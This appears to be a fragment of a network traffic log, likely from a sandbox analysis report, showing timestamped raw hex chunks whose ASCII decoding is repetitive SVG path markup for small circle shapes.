                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC468INData Raw: 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: 8"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC484INData Raw: 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                    Data Ascii: 8.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC500INData Raw: 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                    Data Ascii: .87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC516INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c
                                                                                                                                                                                                                                                                    Data Ascii: 7,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC532INData Raw: 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c
                                                                                                                                                                                                                                                                    Data Ascii: .36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC548INData Raw: 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35
                                                                                                                                                                                                                                                                    Data Ascii: 65,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.5
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC564INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC580INData Raw: 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34
                                                                                                                                                                                                                                                                    Data Ascii: 2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC596INData Raw: 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35
                                                                                                                                                                                                                                                                    Data Ascii: 1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC612INData Raw: 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: 9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC628INData Raw: 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36
                                                                                                                                                                                                                                                                    Data Ascii: 2,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.6
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC644INData Raw: 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                    Data Ascii: 1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC660INData Raw: 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                                    Data Ascii: ,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC676INData Raw: 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC692INData Raw: 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC708INData Raw: 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                                    Data Ascii: ,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC724INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d
                                                                                                                                                                                                                                                                    Data Ascii: class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-
